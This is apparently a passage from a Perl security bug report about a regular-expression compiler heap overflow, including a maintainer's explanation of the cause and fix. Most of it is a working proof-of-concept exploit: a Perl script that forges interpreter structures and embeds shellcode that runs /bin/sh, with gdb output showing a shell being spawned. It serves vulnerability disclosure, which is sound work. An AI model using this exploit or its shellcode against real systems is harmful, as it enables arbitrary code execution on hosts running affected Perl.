Perl\\_sv\\_free2 \\(sv=sv@\u0026#8203;entry=0xa34c7d\\,\nrc=\\\u003coptimized out\u003e\\) at sv\\.c\u0026#8203;:7038\n\\#8 0x0000000000528c48 in S\\_SvREFCNT\\_dec\\_NN \\(sv=0xa34c7d\\) at inline\\.h\u0026#8203;:227\n\\#9 do\\_clean\\_named\\_objs \\(sv=sv@\u0026#8203;entry=0xa2e958\\) at sv\\.c\u0026#8203;:560\n\\#10 0x0000000000524a07 in S\\_visit \\(f=0x5288b0 \\\u003cdo\\_clean\\_named\\_objs\u003e\\,\nflags=32777\\, mask=49407\\) at sv\\.c\u0026#8203;:476\n\\#11 0x00000000005292b0 in Perl\\_sv\\_clean\\_objs \\(\\) at sv\\.c\u0026#8203;:631\n\\#12 0x000000000044ef00 in perl\\_destruct \\(my\\_perl=\\\u003coptimized out\u003e\\) at\nperl\\.c\u0026#8203;:908\n\\#13 0x000000000041fb74 in main \\(argc=\\\u003coptimized out\u003e\\, argv=\\\u003coptimized out\u003e\\,\nenv=\\\u003coptimized out\u003e\\) at perlmain\\.c\u0026#8203;:133\n\\(gdb\\) c\nContinuing\\.\nprocess 13359 is executing new program\u0026#8203;: /usr/bin/bash\nError in re\\-setting breakpoint 2\u0026#8203;: Function \"S\\_mg\\_free\\_struct\" not defined\\.\nsh\\-4\\.4$ date\nDetaching after fork from child process 13509\\.\nMon Aug 27 22\u0026#8203;:04\u0026#8203;:46 JST 2018\n\\`\\`\\`\n\n2018\\-08\\-16 12\u0026#8203;:52 GMT\\+09\u0026#8203;:00 Karl Williamson via RT \\\u003c\nperl5\\-security\\-report\\-followup@\u0026#8203;perl\\.org\u003e\u0026#8203;:\n\n\u003e Resending this as it did not make it to the list\u0026#8203;:\n\u003e\n\u003e On Wed\\, 15 Aug 2018 11\u0026#8203;:01\u0026#8203;:24 \\-0700\\, khw wrote\u0026#8203;:\n\u003e \u003e I suspect this is a serious security issue\\. One can position where\n\u003e \u003e beyond the end of buffer gets written by adding \\\\x80's to the ones\n\u003e \u003e already there\\. 
But I'd be happy to be wrong about this\\.\n\u003e \u003e\n\u003e \u003e The cause is one branch during the parsing leaves the parse pointer\n\u003e \u003e positioned one too far\\, and that causes the backslash to be skipped\n\u003e \u003e during pass2\\, which causes a '\\]' to be treated as a metacharacter\n\u003e \u003e instead of a literal\\.\n\u003e \u003e\n\u003e \u003e The fix is to remove the single line that incorrectly increments the\n\u003e \u003e parse pointer\\.\n\u003e \u003e I don't know that this being an experimental feature has any bearing\n\u003e \u003e on it\\.\n\u003e \u003e\n\u003e \u003e There is another thing\\. The minus sign in this case could have been\n\u003e \u003e caught as incorrect\\. But the same out\\-of\\-bounds writes would occur if\n\u003e \u003e a '^' replaced the minus\\, and that would be a correct use\\.\n\u003e \u003e\n\u003e \u003e Karl Williamson\n\u003e\n\u003e","bodyHTML":"\u003ch3 dir=\"auto\"\u003eFrom \u003ca class=\"user-mention notranslate\" data-hovercard-type=\"user\" data-hovercard-url=\"/users/Etsukata/hovercard\" data-octo-click=\"hovercard-link-click\" data-octo-dimensions=\"link_type:self\" href=\"https://github.com/Etsukata\"\u003e@Etsukata\u003c/a\u003e\u003c/h3\u003e\n\u003cp dir=\"auto\"\u003eThe following code generates a regexp which executes arbitrary command\u003cbr\u003e\nduring global destruction.\u003cbr\u003e\nIt overwrites some SV pointer address to a crafted fake SV on overwritten\u003cbr\u003e\nheap which has the malicious svt_free(shell_code) on its magic vtable.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eLimitations​:\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e  - must set `execstack -s` to perl\u003cbr\u003e\n  - require address leak(exact address of overwritten heap)\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e```\u003cbr\u003e\n#!/usr/bin/perl\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e#\u003cbr\u003e\n# RCE exploit PoC for\u003cbr\u003e\n# [perl #133423] regcomp​: heap-buffer-overflow 
write\u003cbr\u003e\n# on perl-blead-48ae8dc\u003cbr\u003e\n#\u003c/p\u003e\n\u003cp dir=\"auto\"\u003euse strict;\u003cbr\u003e\nuse warnings;\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e# 0xabcd =\u0026gt; '\\xcd\\xab\\x00\\x00\\x00\\x00\\x00\\x00'\u003cbr\u003e\nsub h2s {\u003cbr\u003e\n  my $h = shift;\u003cbr\u003e\n  my $sz = shift;\u003cbr\u003e\n  my $ret = '';\u003cbr\u003e\n  for (0..($sz - 1)) {\u003cbr\u003e\n  $ret .= sprintf(\"\\\\x%02x\", (($h \u0026gt;\u0026gt; (8 * $_)) \u0026amp; 0xff));\u003cbr\u003e\n  }\u003cbr\u003e\n  return $ret\u003cbr\u003e\n}\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e# must set `execstack -s` to perl\u003cbr\u003e\nmy $cmd = 'gdb -q --args ~/perl5/perlbrew/perls/perl-blead-debug/bin/perl\u003cbr\u003e\n-DorD -le ';\u003cbr\u003e\nmy $prefix = '\\'my $r = \"(?[(?x​:(?[\\\\\\\\a]))\\\\\\\\]a\\x00';\u003c/p\u003e\n\u003cp dir=\"auto\"\u003emy $address = 0xa34c7d; # overwrite start address\u003cbr\u003e\n  # search with​:\u003cbr\u003e\n  # (gdb) b regcomp.c​:14044\u003cbr\u003e\n  # (gdb) p s\u003cbr\u003e\n  # [CAUTION] must not contain ']' (0x5d)\u003cbr\u003e\n  #\u003cbr\u003e\nmy $sv_any_address = $address + 8 + 4 + 4 + 8;\u003cbr\u003e\nmy $stash_address = $sv_any_address + 8 + 8;\u003cbr\u003e\nmy $stash_address2 = $stash_address + 8 + 4 + 4;\u003cbr\u003e\nmy $magic_address = $stash_address + 8 + 4 + 4 + 8 + 8 + 8 + 19 + 8;\u003cbr\u003e\nmy $mg_virtual_address = $magic_address + 8 + 8 + 2 + 1 + 1 + 8 + 8 + 8;\u003cbr\u003e\nmy $shell_code_address = $mg_virtual_address + 8 + 8 + 8 + 8 + 8;\u003c/p\u003e\n\u003cp dir=\"auto\"\u003emy $body =\u003cbr\u003e\n# sv($address)\u003cbr\u003e\n  h2s($sv_any_address, 8)\u003cbr\u003e\n. h2s(0x01, 4) # sv_refcnt\u003cbr\u003e\n. h2s(0x100007, 4) # sv_flags (SVt_PVMG || SVs_OBJECT)\u003cbr\u003e\n. h2s(0x00, 8) # sv-\u0026gt;sv_u.svu_pv\u003cbr\u003e\n# any($sv_any_address)\u003cbr\u003e\n. h2s($stash_address, 8) # HV* xmg_stash\u003cbr\u003e\n. 
h2s($magic_address, 8) # union _xmgu xmg_u (MAGIC* xmg_magic)\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e# xmg_stash($stash_address)\u003cbr\u003e\n. h2s($stash_address2, 8) # sv_any\u003cbr\u003e\n. h2s(0x01, 4) # sv_refcnt\u003cbr\u003e\n. h2s(0x0c, 4) # sv_flags (SVt_PVHV)\u003cbr\u003e\n# any($stash_address2)\u003cbr\u003e\n. h2s(0x00, 8) # HV* xmg_stash\u003cbr\u003e\n. h2s($magic_address, 8) # union _xmgu xmg_u (MAGIC* xmg_magic)\u003cbr\u003e\n. h2s(0x00, 8) # padding\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e. '\" . \"a\" x 19 . \"' # padding\u003cbr\u003e\n. h2s($address, 8) # OVERWRITE gvp\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e# xmg_magic($magic_address)\u003cbr\u003e\n. h2s(0x00, 8) # MAGIC* mg_moremagic;\u003cbr\u003e\n. h2s($mg_virtual_address, 8) # MGVTBL* mg_virtual /* pointer to magic\u003cbr\u003e\nfunctions */\u003cbr\u003e\n. h2s(0x00, 2) # U16 mg_private;\u003cbr\u003e\n. h2s(0x00, 1) # char mg_type;\u003cbr\u003e\n. h2s(0x00, 1) # U8 mg_flags;\u003cbr\u003e\n. h2s(0x00, 8) # SSize_t mg_len;\u003cbr\u003e\n. h2s(0x00, 8) # SV* mg_obj;\u003cbr\u003e\n. h2s(0x00, 8) # char* mg_ptr;\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e# mg_virual($mg_virtual_address)\u003cbr\u003e\n. h2s(0x00, 8) # int (*svt_get) (pTHX_ SV *sv, MAGIC*\u003cbr\u003e\nmg);\u003cbr\u003e\n. h2s(0x00, 8) # int (*svt_set) (pTHX_ SV *sv, MAGIC*\u003cbr\u003e\nmg);\u003cbr\u003e\n. h2s(0x00, 8) # U32 (*svt_len) (pTHX_ SV *sv, MAGIC*\u003cbr\u003e\nmg);\u003cbr\u003e\n. h2s(0x00, 8) # int (*svt_clear)(pTHX_ SV *sv, MAGIC* mg);\u003cbr\u003e\n. h2s($shell_code_address, 8) # int (*svt_free) (pTHX_ SV *sv, MAGIC*\u003cbr\u003e\nmg);\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e# x86_64 shell_code\u003cbr\u003e\n.\u003cbr\u003e\n'\\x48\\x31\\xd2\\x52\\x48\\xb8\\x2f\\x62\\x69\\x6e\\x2f\\x2f\\x73\\x68\\x50\\x48\\x89\\xe7\\x52\\x57\\x48\\x89\\xe6\\x48\\x8d\\x42\\x3b\\x0f\\x05'\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e. 
'])a\\\\\\\\6\"; qr/$r/\\'';\u003c/p\u003e\n\u003cp dir=\"auto\"\u003emy $payload = $prefix . $body;\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eprint $cmd . $payload . \"\\n\";\u003cbr\u003e\n```\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eSample output\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e```\u003cbr\u003e\n[eiichi@​x1 exploit]$ perl perl_regexp_mg_free.pl\u003cbr\u003e\ngdb -q --args ~/perl5/perlbrew/perls/perl-blead-debug/bin/perl -DorD -le\u003cbr\u003e\n'my $r =\u003cbr\u003e\n\"(?[(?x​:(?[\\\\a]))\\\\]a\\x00\\x95\\x4c\\xa3\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x07\\x00\\x10\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xa5\\x4c\\xa3\\x00\\x00\\x00\\x00\\x00\\xe8\\x4c\\xa3\\x00\\x00\\x00\\x00\\x00\\xb5\\x4c\\xa3\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x0c\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xe8\\x4c\\xa3\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\u003cbr\u003e\n. \"a\" x 19 .\u003cbr\u003e\n\"\\x7d\\x4c\\xa3\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x14\\x4d\\xa3\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x3c\\x4d\\xa3\\x00\\x00\\x00\\x00\\x00\\x48\\x31\\xd2\\x52\\x48\\xb8\\x2f\\x62\\x69\\x6e\\x2f\\x2f\\x73\\x68\\x50\\x48\\x89\\xe7\\x52\\x57\\x48\\x89\\xe6\\x48\\x8d\\x42\\x3b\\x0f\\x05])a\\\\6\";\u003cbr\u003e\nqr/$r/'\u003cbr\u003e\n[eiichi@​x1 exploit]$ gdb -q --args\u003cbr\u003e\n~/perl5/perlbrew/perls/perl-blead-debug/bin/perl -DorD -le 'my $r 
=\u003cbr\u003e\n\"(?[(?x​:(?[\\\\a]))\\\\]a\\x00\\x95\\x4c\\xa3\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x07\\x00\\x10\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xa5\\x4c\\xa3\\x00\\x00\\x00\\x00\\x00\\xe8\\x4c\\xa3\\x00\\x00\\x00\\x00\\x00\\xb5\\x4c\\xa3\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x0c\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xe8\\x4c\\xa3\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\u003cbr\u003e\n. \"a\" x 19 .\u003cbr\u003e\n\"\\x7d\\x4c\\xa3\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x14\\x4d\\xa3\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x3c\\x4d\\xa3\\x00\\x00\\x00\\x00\\x00\\x48\\x31\\xd2\\x52\\x48\\xb8\\x2f\\x62\\x69\\x6e\\x2f\\x2f\\x73\\x68\\x50\\x48\\x89\\xe7\\x52\\x57\\x48\\x89\\xe6\\x48\\x8d\\x42\\x3b\\x0f\\x05])a\\\\6\";\u003cbr\u003e\nqr/$r/'\u003cbr\u003e\nReading symbols from\u003cbr\u003e\n/home/eiichi/perl5/perlbrew/perls/perl-blead-debug/bin/perl...done.\u003cbr\u003e\n(gdb) b regcomp.c​:14044\u003cbr\u003e\nBreakpoint 1 at 0x4cb38d​: file regcomp.c, line 14044.\u003cbr\u003e\n(gdb) run\u003cbr\u003e\nStarting program​:\u003cbr\u003e\n/home/eiichi/perl5/perlbrew/perls/perl-blead-debug/bin/perl -DorD -le my\\\u003cbr\u003e\n\\$r\\ 
=\\\u003cbr\u003e\n\\\"\\(\\?\\[\\(\\?x​:\\(\\?\\[\\\\\\\\a\\]\\)\\)\\\\\\\\\\]a\\\\x00\\\\x95\\\\x4c\\\\xa3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x01\\\\x00\\\\x00\\\\x00\\\\x07\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xa5\\\\x4c\\\\xa3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x4c\\\\xa3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb5\\\\x4c\\\\xa3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x01\\\\x00\\\\x00\\\\x00\\\\x0c\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x4c\\\\xa3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\"\\\u003cbr\u003e\n.\\ \\\"a\\\"\\ x\\ 19\\ .\\\u003cbr\u003e\n\\\"\\\\x7d\\\\x4c\\\\xa3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x14\\\\x4d\\\\xa3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x3c\\\\x4d\\\\xa3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x48\\\\x31\\\\xd2\\\\x52\\\\x48\\\\xb8\\\\x2f\\\\x62\\\\x69\\\\x6e\\\\x2f\\\\x2f\\\\x73\\\\x68\\\\x50\\\\x48\\\\x89\\\\xe7\\\\x52\\\\x57\\\\x48\\\\x89\\\\xe6\\\\x48\\\\x8d\\\\x42\\\\x3b\\\\x0f\\\\x05\\]\\)a\\\\\\\\6\\\"\\;\\\u003cbr\u003e\nqr/\\$r/\u003cbr\u003e\n[Thread debugging using libthread_db enabled]\u003cbr\u003e\nUsing host libthread_db library \"/lib64/libthread_db.so.1\".\u003cbr\u003e\nwarning​: Loadable section \".note.gnu.property\" outside of ELF segments\u003cbr\u003e\nwarning​: Loadable section \".note.gnu.property\" outside of ELF segments\u003cbr\u003e\nwarning​: Loadable section \".note.gnu.property\" 
outside of ELF segments\u003cbr\u003e\n(-e​:0) sv_upgrade clearing PL_stashcache\u003cbr\u003e\n(-e​:0) sv_upgrade clearing PL_stashcache\u003cbr\u003e\n(-e​:0) sv_upgrade clearing PL_stashcache\u003cbr\u003e\n(-e​:0) sv_upgrade clearing PL_stashcache\u003cbr\u003e\n(-e​:0) sv_upgrade clearing PL_stashcache\u003cbr\u003e\n(-e​:2) Looking for DESTROY method for IO​::File\u003cbr\u003e\n(-e​:2) Looking for method DESTROY in package IO​::File\u003cbr\u003e\n(-e​:2) Looking for method DESTROY in package UNIVERSAL\u003cbr\u003e\n(-e​:2) Looking for method AUTOLOAD in package IO​::File\u003cbr\u003e\n(-e​:2) Looking for method AUTOLOAD in package UNIVERSAL\u003cbr\u003e\n(-e​:2) Set cached DESTROY method 0 for IO​::File\u003cbr\u003e\nEnabling \u003cmath-renderer class=\"js-inline-math\" style=\"display: inline-block\" data-static-url=\"https://github.githubassets.com/static\" data-run-id=\"fe472446ab8b6d2948dbfca26e766d8d\"\u003e$` $\u003c/math-renderer\u003e\u0026amp;amp; $' support (0x7).\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eEXECUTING...\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eCompiling REx\u003cbr\u003e\n\"(?[(?x​:(?[\\a]))\\]a%0%x{95}L%x{a3}%0%0%0%0%0%1%0%0%0%7%0%20%0\"...\u003cbr\u003e\nThe regex_sets feature is experimental in regex; marked by \u0026lt;-- HERE in\u003cbr\u003e\nm/(?[ \u0026lt;-- HERE (?x​:(?[\\a]))\\]a?L??L???L?\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e?aaaaaaaaaaaaaaaaaaa}L?M?\u0026lt;M?H1H?/bin//shPH?WH??B;])a\\6/ at -e line 1.\u003cbr\u003e\nThe regex_sets feature is experimental in regex; marked by \u0026lt;-- HERE in\u003cbr\u003e\nm/(?[(?x​:(?[ \u0026lt;-- HERE \\a]))\\]a?L??L???L?\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e?aaaaaaaaaaaaaaaaaaa}L?M?\u0026lt;M?H1H?/bin//shPH?WH??B;])a\\6/ at -e line 1.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eBreakpoint 1, S_regatom (pRExC_state=pRExC_state@​entry=0x7fffffffcd40,\u003cbr\u003e\nflagp=flagp@​entry=0x7fffffffca24,\u003cbr\u003e\n  depth=depth@​entry=4) at 
regcomp.c​:14044\u003cbr\u003e\n14044 *(s)++ = (U8) ender;\u003cbr\u003e\nMissing separate debuginfos, use​: dnf debuginfo-install\u003cbr\u003e\nkeyutils-libs-1.5.10-6.fc28.x86_64 krb5-libs-1.16.1-13.fc28.x86_64\u003cbr\u003e\nlibcom_err-1.44.2-0.fc28.x86_64\u003cbr\u003e\nlibnsl2-1.2.0-2.20180605git4a062cf.fc28.x86_64 libselinux-2.8-1.fc28.x86_64\u003cbr\u003e\nlibtirpc-1.0.3-3.rc2.fc28.x86_64 libxcrypt-4.1.1-4.fc28.x86_64\u003cbr\u003e\nopenssl-libs-1.1.0h-3.fc28.x86_64 pcre2-10.31-8.fc28.x86_64\u003cbr\u003e\nzlib-1.2.11-8.fc28.x86_64\u003cbr\u003e\n(gdb) p s\u003cbr\u003e\n$1 = 0xa34c7d \"\"\u003cbr\u003e\n(gdb) b S_mg_free_struct\u003cbr\u003e\nBreakpoint 2 at 0x4f0620​: file mg.c, line 556.\u003cbr\u003e\n(gdb) dis br 1\u003cbr\u003e\n(gdb) c\u003cbr\u003e\nContinuing.\u003cbr\u003e\npanic​: reg_node overrun trying to emit 0, a34d5c\u0026gt;=a34c8c at -e line 1.\u003cbr\u003e\nCleaning named glob SV object​:\u003cbr\u003e\nSV = PVMG(0xa34c95) at 0xa34c7d\u003cbr\u003e\n  REFCNT = 1\u003cbr\u003e\n  FLAGS = (OBJECT)\u003cbr\u003e\n  IV = 0\u003cbr\u003e\n  NV = 5.28751820946919e-317\u003cbr\u003e\n  PV = 0\u003cbr\u003e\n  MAGIC = 0xa34ce8\u003cbr\u003e\n  MG_VIRTUAL = 0xa34d14\u003cbr\u003e\n  MG_TYPE = PERL_MAGIC_sv(\\0)\u003cbr\u003e\n  STASH = 0xa34ca5\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eBreakpoint 2, S_mg_free_struct (sv=sv@​entry=0xa34ca5, mg=0xa34ce8) at\u003cbr\u003e\nmg.c​:556\u003cbr\u003e\n556 const MGVTBL* const vtbl = mg-\u0026gt;mg_virtual;\u003cbr\u003e\n(gdb) bt\u003cbr\u003e\n#0 S_mg_free_struct (sv=sv@​entry=0xa34ca5, mg=0xa34ce8) at mg.c​:556\u003cbr\u003e\n\u003ca class=\"issue-link js-issue-link\" data-error-text=\"Failed to load title\" data-id=\"24492722\" data-permission-text=\"Title is private\" data-url=\"https://github.com/Perl/perl5/issues/1\" data-hovercard-type=\"pull_request\" data-hovercard-url=\"/Perl/perl5/pull/1/hovercard\" href=\"https://github.com/Perl/perl5/pull/1\"\u003e#1\u003c/a\u003e 0x00000000004f1153 in 
Perl_mg_free (sv=sv@​entry=0xa34ca5) at mg.c​:588\u003cbr\u003e\n\u003ca class=\"issue-link js-issue-link\" data-error-text=\"Failed to load title\" data-id=\"32825340\" data-permission-text=\"Title is private\" data-url=\"https://github.com/Perl/perl5/issues/2\" data-hovercard-type=\"pull_request\" data-hovercard-url=\"/Perl/perl5/pull/2/hovercard\" href=\"https://github.com/Perl/perl5/pull/2\"\u003e#2\u003c/a\u003e 0x0000000000527d9e in Perl_sv_clear (orig_sv=orig_sv@​entry=0xa34ca5) at\u003cbr\u003e\nsv.c​:6539\u003cbr\u003e\n\u003ca class=\"issue-link js-issue-link\" data-error-text=\"Failed to load title\" data-id=\"35342020\" data-permission-text=\"Title is private\" data-url=\"https://github.com/Perl/perl5/issues/3\" data-hovercard-type=\"pull_request\" data-hovercard-url=\"/Perl/perl5/pull/3/hovercard\" href=\"https://github.com/Perl/perl5/pull/3\"\u003e#3\u003c/a\u003e 0x0000000000528784 in Perl_sv_free2 (sv=0xa34ca5, rc=\u0026lt;optimized out\u0026gt;)\u003cbr\u003e\nat sv.c​:7038\u003cbr\u003e\n\u003ca class=\"issue-link js-issue-link\" data-error-text=\"Failed to load title\" data-id=\"38664231\" data-permission-text=\"Title is private\" data-url=\"https://github.com/Perl/perl5/issues/4\" data-hovercard-type=\"pull_request\" data-hovercard-url=\"/Perl/perl5/pull/4/hovercard\" href=\"https://github.com/Perl/perl5/pull/4\"\u003e#4\u003c/a\u003e 0x00000000005273ec in S_SvREFCNT_dec (sv=\u0026lt;optimized out\u0026gt;) at\u003cbr\u003e\ninline.h​:216\u003cbr\u003e\n\u003ca class=\"issue-link js-issue-link\" data-error-text=\"Failed to load title\" data-id=\"39416547\" data-permission-text=\"Title is private\" data-url=\"https://github.com/Perl/perl5/issues/5\" data-hovercard-type=\"pull_request\" data-hovercard-url=\"/Perl/perl5/pull/5/hovercard\" href=\"https://github.com/Perl/perl5/pull/5\"\u003e#5\u003c/a\u003e S_curse (sv=sv@​entry=0xa34c7d, check_refcnt=check_refcnt@​entry=true) at\u003cbr\u003e\nsv.c​:6970\u003cbr\u003e\n\u003ca class=\"issue-link 
js-issue-link\" data-error-text=\"Failed to load title\" data-id=\"53427695\" data-permission-text=\"Title is private\" data-url=\"https://github.com/Perl/perl5/issues/6\" data-hovercard-type=\"pull_request\" data-hovercard-url=\"/Perl/perl5/pull/6/hovercard\" href=\"https://github.com/Perl/perl5/pull/6\"\u003e#6\u003c/a\u003e 0x000000000052783a in Perl_sv_clear (orig_sv=orig_sv@​entry=0xa34c7d) at\u003cbr\u003e\nsv.c​:6531\u003cbr\u003e\n\u003ca class=\"issue-link js-issue-link\" data-error-text=\"Failed to load title\" data-id=\"90982472\" data-permission-text=\"Title is private\" data-url=\"https://github.com/Perl/perl5/issues/7\" data-hovercard-type=\"pull_request\" data-hovercard-url=\"/Perl/perl5/pull/7/hovercard\" href=\"https://github.com/Perl/perl5/pull/7\"\u003e#7\u003c/a\u003e 0x0000000000528784 in Perl_sv_free2 (sv=sv@​entry=0xa34c7d,\u003cbr\u003e\nrc=\u0026lt;optimized out\u0026gt;) at sv.c​:7038\u003cbr\u003e\n\u003ca class=\"issue-link js-issue-link\" data-error-text=\"Failed to load title\" data-id=\"98283145\" data-permission-text=\"Title is private\" data-url=\"https://github.com/Perl/perl5/issues/8\" data-hovercard-type=\"pull_request\" data-hovercard-url=\"/Perl/perl5/pull/8/hovercard\" href=\"https://github.com/Perl/perl5/pull/8\"\u003e#8\u003c/a\u003e 0x0000000000528c48 in S_SvREFCNT_dec_NN (sv=0xa34c7d) at inline.h​:227\u003cbr\u003e\n\u003ca class=\"issue-link js-issue-link\" data-error-text=\"Failed to load title\" data-id=\"98288284\" data-permission-text=\"Title is private\" data-url=\"https://github.com/Perl/perl5/issues/9\" data-hovercard-type=\"pull_request\" data-hovercard-url=\"/Perl/perl5/pull/9/hovercard\" href=\"https://github.com/Perl/perl5/pull/9\"\u003e#9\u003c/a\u003e do_clean_named_objs (sv=sv@​entry=0xa2e958) at sv.c​:560\u003cbr\u003e\n\u003ca class=\"issue-link js-issue-link\" data-error-text=\"Failed to load title\" data-id=\"170856524\" data-permission-text=\"Title is private\" 
data-url=\"https://github.com/Perl/perl5/issues/10\" data-hovercard-type=\"pull_request\" data-hovercard-url=\"/Perl/perl5/pull/10/hovercard\" href=\"https://github.com/Perl/perl5/pull/10\"\u003e#10\u003c/a\u003e 0x0000000000524a07 in S_visit (f=0x5288b0 \u0026lt;do_clean_named_objs\u0026gt;,\u003cbr\u003e\nflags=32777, mask=49407) at sv.c​:476\u003cbr\u003e\n\u003ca class=\"issue-link js-issue-link\" data-error-text=\"Failed to load title\" data-id=\"214252446\" data-permission-text=\"Title is private\" data-url=\"https://github.com/Perl/perl5/issues/11\" data-hovercard-type=\"pull_request\" data-hovercard-url=\"/Perl/perl5/pull/11/hovercard\" href=\"https://github.com/Perl/perl5/pull/11\"\u003e#11\u003c/a\u003e 0x00000000005292b0 in Perl_sv_clean_objs () at sv.c​:631\u003cbr\u003e\n\u003ca class=\"issue-link js-issue-link\" data-error-text=\"Failed to load title\" data-id=\"275535515\" data-permission-text=\"Title is private\" data-url=\"https://github.com/Perl/perl5/issues/12\" data-hovercard-type=\"pull_request\" data-hovercard-url=\"/Perl/perl5/pull/12/hovercard\" href=\"https://github.com/Perl/perl5/pull/12\"\u003e#12\u003c/a\u003e 0x000000000044ef00 in perl_destruct (my_perl=\u0026lt;optimized out\u0026gt;) at\u003cbr\u003e\nperl.c​:908\u003cbr\u003e\n\u003ca class=\"issue-link js-issue-link\" data-error-text=\"Failed to load title\" data-id=\"329536409\" data-permission-text=\"Title is private\" data-url=\"https://github.com/Perl/perl5/issues/13\" data-hovercard-type=\"pull_request\" data-hovercard-url=\"/Perl/perl5/pull/13/hovercard\" href=\"https://github.com/Perl/perl5/pull/13\"\u003e#13\u003c/a\u003e 0x000000000041fb74 in main (argc=\u0026lt;optimized out\u0026gt;, argv=\u0026lt;optimized out\u0026gt;,\u003cbr\u003e\nenv=\u0026lt;optimized out\u0026gt;) at perlmain.c​:133\u003cbr\u003e\n(gdb) c\u003cbr\u003e\nContinuing.\u003cbr\u003e\nprocess 13359 is executing new program​: /usr/bin/bash\u003cbr\u003e\nError in re-setting breakpoint 2​: Function 
